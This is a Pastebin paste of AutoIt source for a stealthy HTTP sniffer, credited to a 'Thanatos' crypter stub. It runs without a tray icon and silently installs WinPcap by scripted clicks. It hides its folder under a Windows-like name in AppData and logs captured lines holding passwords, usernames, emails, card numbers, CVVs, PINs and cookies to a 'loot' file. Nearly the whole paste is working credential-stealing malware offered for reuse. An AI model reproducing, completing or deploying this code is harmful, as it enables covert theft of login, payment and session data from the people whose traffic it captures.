Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #NoTrayIcon
- #Region ;**** Directives created by AutoIt3Wrapper_GUI ****
- #AutoIt3Wrapper_Outfile=sniffer.exe
- #AutoIt3Wrapper_Compression=4
- #AutoIt3Wrapper_UseUpx=y
- #AutoIt3Wrapper_Res_Language=1033
- #AutoIt3Wrapper_Res_requestedExecutionLevel=asInvoker
- #AutoIt3Wrapper_Run_Tidy=y
- #Tidy_Parameters=/gd /reel /sci 0 /kv 5 /sf
- #AutoIt3Wrapper_Tidy_Stop_OnError=n
- #AutoIt3Wrapper_Run_Au3Stripper=y
- #Au3Stripper_Parameters=/so /mi 5 /mo
- #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
- #include <Crypt.au3>
- ;==============================================;
- ; Thanatos AutoIt Crypter stub By Freak ;
- ; Coded By Freak ;
- ; Thanks to M3 for GUI ;
- ; Keep Credits if you Using Source ;
- ;==============================================;
- Opt("ExpandEnvStrings", 1)
- Global $installdir = @AppDataDir & '\Windows Shell Common Binary'
- Global $lootLoc = $installdir & "\dump.dat"
- Global $sniffopt = "tcp port (80 or 8080 or 8888 or 8181)"
- Global Const $sMutex = BinaryToString("0x1337FF207F2838EEEBD6E4F2EF23323727FAEDCBECFE31263F25D4F1C6E4F0EF2A343225E9EFD0E6FF7A2B2125E4E5D0E8F137253F41FF1337")
- _Singleton($sMutex)
- If Not FileExists(@SystemDir & "\wpcap.dll") Then
- InetGet("https://www.winpcap.org/install/bin/WinPcap_4_1_3.exe", @TempDir & "\WinPcap_4_1_3.exe")
- Run(@TempDir & "\WinPcap_4_1_3.exe")
- WinWaitActive("WinPcap 4.1.3 Setup", "Welcome to the WinPcap")
- Send("!n")
- WinWaitActive("WinPcap 4.1.3 Setup", "License Agreement")
- Send("!a")
- WinWaitActive("WinPcap 4.1.3 Setup", "Installation options")
- ControlClick("WinPcap 4.1.3 Setup", "Installation options", "[CLASS:Button; INSTANCE:2]")
- WinWaitActive("WinPcap 4.1.3 Setup", "Completing the WinPcap")
- Send("!f")
- EndIf
- installPCAP()
- $winpcap = _PcapSetup()
- $pcap_devices = _PcapGetDeviceList()
- $iface = 0
- $pcap = _PcapStartCapture($pcap_devices[$iface][0], "host " & $pcap_devices[$iface][7] & " and " & $sniffopt, 0, 65536, 2 ^ 24, 0)
- Dim $keywords[20]
- $keywords[0] = "GET /"
- $keywords[1] = "POST /"
- $keywords[2] = "Host: "
- $keywords[3] = "User-Agent: "
- $keywords[4] = "Content-"
- $keywords[5] = "password="
- $keywords[6] = "user_name="
- $keywords[7] = "user="
- $keywords[8] = "Username="
- $keywords[9] = "User="
- $keywords[10] = "login="
- $keywords[11] = "email="
- $keywords[12] = "username="
- $keywords[13] = "holder="
- $keywords[14] = "number="
- $keywords[15] = "cvv="
- $keywords[16] = "pin="
- $keywords[17] = "transaction"
- $keywords[18] = "bank"
- $keywords[19] = "Cookie: "
- $lootHandle = FileOpen($lootLoc, 1)
- $sPacketText = ""
- $oldPacketText = ""
- While True
- $aPacket = _TCP_Recv($pcap)
- If UBound($aPacket) > 20 Then
- $sPacketText = BinaryToString("0x" & $aPacket[20])
- If $sPacketText = $oldPacketText Then
- Sleep(250)
- ContinueLoop
- EndIf
- If StringLen($sPacketText) > 13 Then
- For $key = 0 To UBound($keywords) - 1
- If StringInStr($sPacketText, $keywords[$key]) Then
- If Dec(Hex(BinaryToString("0x" & $aPacket[14]))) = 6667 Then ExitLoop
- $aPacketText = StringSplit(StringReplace($sPacketText, @CR, ""), @LF)
- For $aPT = 1 To UBound($aPacketText) - 1
- If StringInStr($aPacketText[$aPT], $keywords[$key]) Then
- FileWriteLine($lootHandle, $aPacketText[$aPT])
- FileFlush($lootHandle)
- $oldPacketText = $sPacketText
- EndIf
- Next
- $oldPacketText = $sPacketText
- Else
- ConsoleWrite($sPacketText & @CRLF)
- EndIf
- Next
- EndIf
- EndIf
- $oldPacketText = $sPacketText
- WEnd
- Func _PcapGetDeviceList()
- Local $alldevs = DllStructCreate("ptr")
- Local $r = DllCall($Pcap_dll, "int:cdecl", "pcap_findalldevs_ex", "str", "rpcap://", "ptr", 0, "ptr", DllStructGetPtr($alldevs), "ptr", DllStructGetPtr($Pcap_errbuf))
- If (@error > 0) Then Return -1
- If $r[0] = -1 Then Return -1
- Local $next = DllStructGetData($alldevs, 1)
- Local $list[1][14]
- Local $i = 0
- While ($next <> 0)
- Local $pcap_if = DllStructCreate("ptr next;ptr name;ptr desc;ptr addresses;uint flags", $next)
- Local $len_name = DllCall("kernel32.dll", "int", "lstrlen", "ptr", DllStructGetData($pcap_if, 2))
- Local $len_desc = DllCall("kernel32.dll", "int", "lstrlen", "ptr", DllStructGetData($pcap_if, 3))
- $list[$i][0] = DllStructGetData(DllStructCreate("char[" & ($len_name[0] + 1) & "]", DllStructGetData($pcap_if, 2)), 1)
- $list[$i][1] = DllStructGetData(DllStructCreate("char[" & ($len_desc[0] + 1) & "]", DllStructGetData($pcap_if, 3)), 1)
- Local $next_addr = DllStructGetData($pcap_if, "addresses")
- Local $device = StringTrimLeft($list[$i][0], 8)
- Local $snames = DllStructCreate("char Name[" & (StringLen($device) + 1) & "]")
- DllStructSetData($snames, 1, $device)
- Local $handle = DllCall("packet.dll", "ptr:cdecl", "PacketOpenAdapter", "ptr", DllStructGetPtr($snames))
- If IsPtr($handle[0]) Then
- Local $packetoiddata = DllStructCreate("ulong oid;ulong length;ubyte data[6]")
- DllStructSetData($packetoiddata, 1, 0x01010102)
- DllStructSetData($packetoiddata, 2, 6)
- Local $status = DllCall("packet.dll", "byte:cdecl", "PacketRequest", "ptr", $handle[0], "byte", 0, "ptr", DllStructGetPtr($packetoiddata))
- If $status[0] Then
- Local $mac = DllStructGetData($packetoiddata, 3)
- $list[$i][6] = StringMid($mac, 3, 2) & ":" & StringMid($mac, 5, 2) & ":" & StringMid($mac, 7, 2) & ":" & StringMid($mac, 9, 2) & ":" & StringMid($mac, 11, 2) & ":" & StringMid($mac, 13, 2)
- EndIf
- Local $nettype = DllStructCreate("uint type;uint64 speed")
- $status = DllCall("packet.dll", "byte:cdecl", "PacketGetNetType", "ptr", $handle[0], "ptr", DllStructGetPtr($nettype))
- If $status[0] Then
- $list[$i][5] = DllStructGetData($nettype, 2)
- EndIf
- DllCall("packet.dll", "none:cdecl", "PacketCloseAdapter", "ptr", $handle[0])
- EndIf
- Local $pcap = _PcapStartCapture($list[$i][0], "host 1.2.3.4", 0, 32)
- If IsPtr($pcap) Then
- Local $types = _PcapGetLinkType($pcap)
- If IsArray($types) Then
- $list[$i][2] = $types[0]
- $list[$i][3] = $types[1]
- $list[$i][4] = $types[2]
- EndIf
- _PcapStopCapture($pcap)
- EndIf
- While $next_addr <> 0
- Local $pcap_addr = DllStructCreate("ptr next;ptr addr;ptr netmask;ptr broadaddr;ptr dst", $next_addr)
- Local $j, $addr
- For $j = 2 To 4
- $addr = _PcapSock2addr(DllStructGetData($pcap_addr, $j))
- If StringLen($addr) > 15 Then
- $list[$i][$j + 8] = $addr
- ElseIf StringLen($addr) > 6 Then
- $list[$i][$j + 5] = $addr
- EndIf
- Next
- $next_addr = DllStructGetData($pcap_addr, 1)
- WEnd
- $list[$i][13] = DllStructGetData($pcap_if, 5)
- $next = DllStructGetData($pcap_if, 1)
- $i += 1
- If $next <> 0 Then ReDim $list[$i + 1][14]
- WEnd
- DllCall($Pcap_dll, "none:cdecl", "pcap_freealldevs", "ptr", DllStructGetData($alldevs, 1))
- Return $list
- EndFunc ;==>_PcapGetDeviceList
- Func _PcapGetLinkType($pcap)
- If Not IsPtr($pcap) Then Return -1
- Local $type[3]
- Local $t = DllCall($Pcap_dll, "int:cdecl", "pcap_datalink", "ptr", $pcap)
- $type[0] = $t[0]
- Local $name = DllCall($Pcap_dll, "str:cdecl", "pcap_datalink_val_to_name", "int", $t[0])
- $type[1] = $name[0]
- Local $desc = DllCall($Pcap_dll, "str:cdecl", "pcap_datalink_val_to_description", "int", $t[0])
- $type[2] = $desc[0]
- Return $type
- EndFunc ;==>_PcapGetLinkType
- Func _PcapGetPacket($pcap) ; return 0: timeout, -1:error, -2:EOF in file or if successfull array[0]=time [1]=captured len [2]=packet len [3]=packet data
- If Not IsPtr($pcap) Then Return -1
- $Pcap_ptrhdr = DllStructCreate("ptr")
- $Pcap_ptrpkt = DllStructCreate("ptr")
- Local $pk[4]
- Local $res = DllCall($Pcap_dll, "int:cdecl", "pcap_next_ex", "ptr", $pcap, "ptr", DllStructGetPtr($Pcap_ptrhdr), "ptr", DllStructGetPtr($Pcap_ptrpkt))
- If ($res[0] <> 1) Then Return $res[0]
- Local $pkthdr = DllStructCreate("int s;int us;int caplen;int len", DllStructGetData($Pcap_ptrhdr, 1))
- Local $packet = DllStructCreate("ubyte[" & DllStructGetData($pkthdr, 3) & "]", DllStructGetData($Pcap_ptrpkt, 1))
- Local $time_t = Mod(DllStructGetData($pkthdr, 1) + $Pcap_timebias, 86400)
- $pk[0] = StringFormat("%02d:%02d:%02d.%06d", Int($time_t / 3600), Int(Mod($time_t, 3600) / 60), Mod($time_t, 60), DllStructGetData($pkthdr, 2))
- $pk[1] = DllStructGetData($pkthdr, 3)
- $pk[2] = DllStructGetData($pkthdr, 4)
- $pk[3] = DllStructGetData($packet, 1)
- $Pcap_statV += $pk[2]
- $Pcap_statN += 1
- Return $pk
- EndFunc ;==>_PcapGetPacket
- Func _PcapSendPacket($pcap, $data) ; data in Binary Format
- If Not IsPtr($pcap) Then Return -1
- Local $databuffer = DllStructCreate("ubyte[" & BinaryLen($data) & "]")
- DllStructSetData($databuffer, 1, $data)
- Local $r = DllCall($Pcap_dll, "int:cdecl", "pcap_sendpacket", "ptr", $pcap, "ptr", DllStructGetPtr($databuffer), "int", BinaryLen($data))
- Return $r[0]
- EndFunc ;==>_PcapSendPacket
- Func _PcapSetup() ; return WinPCAP version as full text or -1 if winpcap is not installed, and opens dll
- If Not FileExists(@SystemDir & "\wpcap.dll") Then Return -1
- Global $Pcap_dll = DllOpen(@SystemDir & "\wpcap.dll")
- Global $Pcap_errbuf = DllStructCreate("char[256]")
- Global $Pcap_ptrhdr = 0
- Global $Pcap_ptrpkt = 0
- Global $Pcap_statV ; Total volume captured
- Global $Pcap_statN ; Total number of packets captured
- Global $Pcap_starttime ; Start time of Capture
- Global $Pcap_timebias = (2 ^ 32 - RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation", "ActiveTimeBias")) * 60
- Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_lib_version")
- If (@error > 0) Then Return -1
- Return $v[0]
- EndFunc ;==>_PcapSetup
- Func _PcapSock2addr($sockaddr_ptr)
- If ($sockaddr_ptr = 0) Then Return ""
- Local $sockaddr = DllStructCreate("ushort family;char data[14]", $sockaddr_ptr)
- Local $family = DllStructGetData($sockaddr, 1)
- If ($family = 2) Then
- Local $sockaddr_in = DllStructCreate("short family;ushort port;ubyte addr[4];char zero[8]", $sockaddr_ptr)
- Return DllStructGetData($sockaddr_in, 3, 1) & "." & DllStructGetData($sockaddr_in, 3, 2) & "." & DllStructGetData($sockaddr_in, 3, 3) & "." & DllStructGetData($sockaddr_in, 3, 4)
- EndIf
- If ($family = 23) Then
- Local $sockaddr_in6 = DllStructCreate("ushort family;ushort port;uint flow;ubyte addr[16];uint scope", $sockaddr_ptr)
- Local $bin = DllStructGetData($sockaddr_in6, 4)
- Local $i, $ipv6
- For $i = 0 To 7
- $ipv6 &= StringMid($bin, 3 + $i * 4, 4) & ":"
- Next
- Return StringTrimRight($ipv6, 1)
- EndIf
- Return ""
- EndFunc ;==>_PcapSock2addr
- Func _PcapStartCapture($DeviceName, $filter = "", $promiscuous = 0, $PacketLen = 65536, $buffersize = 0, $realtime = 1)
- Local $handle = DllCall($Pcap_dll, "ptr:cdecl", "pcap_open", "str", $DeviceName, "int", $PacketLen, "int", $promiscuous, "int", 1000, "ptr", 0, "ptr", DllStructGetPtr($Pcap_errbuf))
- If (@error > 0) Then Return -1
- If ($handle[0] = 0) Then Return -1
- DllCall($Pcap_dll, "int:cdecl", "pcap_setnonblock", "ptr", $handle[0], "int", 1, "ptr", DllStructGetPtr($Pcap_errbuf))
- If ($filter <> "") Then
- Local $fcode = DllStructCreate("UINT;ptr")
- Local $comp = DllCall($Pcap_dll, "int:cdecl", "pcap_compile", "ptr", $handle[0], "ptr", DllStructGetPtr($fcode), "str", $filter, "int", 1, "int", 0)
- If ($comp[0] = -1) Then
- Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_geterr", "ptr", $handle[0])
- DllStructSetData($Pcap_errbuf, 1, "Filter: " & $v[0])
- _PcapStopCapture($handle[0])
- Return -1
- EndIf
- Local $set = DllCall($Pcap_dll, "int:cdecl", "pcap_setfilter", "ptr", $handle[0], "ptr", DllStructGetPtr($fcode))
- If ($set[0] = -1) Then
- Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_geterr", "ptr", $handle[0])
- DllStructSetData($Pcap_errbuf, 1, "Filter: " & $v[0])
- _PcapStopCapture($handle[0])
- Return -1
- DllCall($Pcap_dll, "none:cdecl", "pcap_freecode", "ptr", $fcode)
- EndIf
- EndIf
- If $buffersize > 0 Then DllCall($Pcap_dll, "int:cdecl", "pcap_setbuff", "ptr", $handle[0], "int", $buffersize)
- If $realtime Then DllCall($Pcap_dll, "int:cdecl", "pcap_setmintocopy", "ptr", $handle[0], "int", 1)
- $Pcap_statV = 0
- $Pcap_statN = 0
- $Pcap_starttime = TimerInit()
- Return $handle[0]
- EndFunc ;==>_PcapStartCapture
- Func _PcapStopCapture($pcap)
- If Not IsPtr($pcap) Then Return
- DllCall($Pcap_dll, "none:cdecl", "pcap_close", "ptr", $pcap)
- EndFunc ;==>_PcapStopCapture
- Func _Singleton($occurenceName, $flag = 0)
- Local $ERROR_ALREADY_EXISTS = 183
- $occurenceName = StringReplace($occurenceName, "\", "") ; to avoid error
- Local $handle = DllCall("kernel32.dll", "int", "CreateSemaphore", "int", 0, "long", 1, "long", 1, "str", $occurenceName)
- ; Local $handle = DllCall("kernel32.dll", "int", "CreateMutex", "int", 0, "long", 1, "str", $occurenceName)
- Local $lastError = DllCall("kernel32.dll", "int", "GetLastError")
- If $lastError[0] = $ERROR_ALREADY_EXISTS Then
- If $flag = 0 Then
- Exit -1
- Else
- SetError($lastError[0]) ;<---flag <>0 so set @error to $ERROR_ALREADY_EXISTS
- Return 0
- EndIf
- EndIf
- Return $handle[0]
- EndFunc ;==>_Singleton
- Func _TCP_Recv($hCapture, $iInstance = 0, $iTimeOut = 3000)
- Local $blPacketCaptured = False, $iTimer_Capture, $aPacket, $iPacket
- $iTimer_Capture = TimerInit()
- While (TimerDiff($iTimer_Capture) < $iTimeOut Or $iTimeOut = -1)
- $aPacket = _PcapGetPacket($hCapture)
- If IsArray($aPacket) Then
- If $iPacket = $iInstance Then
- Local $aTCPPacket[21]
- $aTCPPacket[0] = StringMid($aPacket[3], 3, 12) ;Destination Mac Address
- $aTCPPacket[1] = StringMid($aPacket[3], 15, 12) ;Source Mac Address
- $aTCPPacket[2] = StringMid($aPacket[3], 27, 4) ;Type
- $aTCPPacket[3] = StringMid($aPacket[3], 31, 2) ;Version & Header length
- $aTCPPacket[4] = StringMid($aPacket[3], 33, 2) ;Differientiated Services Field
- $aTCPPacket[5] = StringMid($aPacket[3], 35, 4) ;Total Length
- $aTCPPacket[6] = StringMid($aPacket[3], 39, 4) ;Identification
- $aTCPPacket[7] = StringMid($aPacket[3], 43, 4) ;Fragment offset
- $aTCPPacket[8] = StringMid($aPacket[3], 47, 2) ;Time to live
- $aTCPPacket[9] = StringMid($aPacket[3], 49, 2) ;Protocol
- $aTCPPacket[10] = StringMid($aPacket[3], 51, 4) ;Header checksum
- $aTCPPacket[11] = StringMid($aPacket[3], 55, 8) ;Source IP Address
- $aTCPPacket[12] = StringMid($aPacket[3], 63, 8) ;Destination IP Address
- $aTCPPacket[13] = StringMid($aPacket[3], 71, 4) ;Source port
- $aTCPPacket[14] = StringMid($aPacket[3], 75, 4) ;Destination port
- $aTCPPacket[15] = StringMid($aPacket[3], 79, 8) ;Sequence number
- $aTCPPacket[16] = StringMid($aPacket[3], 87, 8) ;Acknowledgment number
- $aTCPPacket[17] = StringMid($aPacket[3], 95, 4) ;Flags
- $aTCPPacket[18] = StringMid($aPacket[3], 99, 4) ;Window size value
- $aTCPPacket[19] = StringMid($aPacket[3], 103, 4) ;Checksum
- $aTCPPacket[20] = StringTrimLeft($aPacket[3], 110) ;Data
- Return $aTCPPacket
- EndIf
- $iPacket += 1
- EndIf
- WEnd
- Return -1
- EndFunc ;==>_TCP_Recv
- Func installPCAP()
- DirCreate($installdir)
- FileSetAttrib($installdir, "+SH")
- EndFunc ;==>installPCAP
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement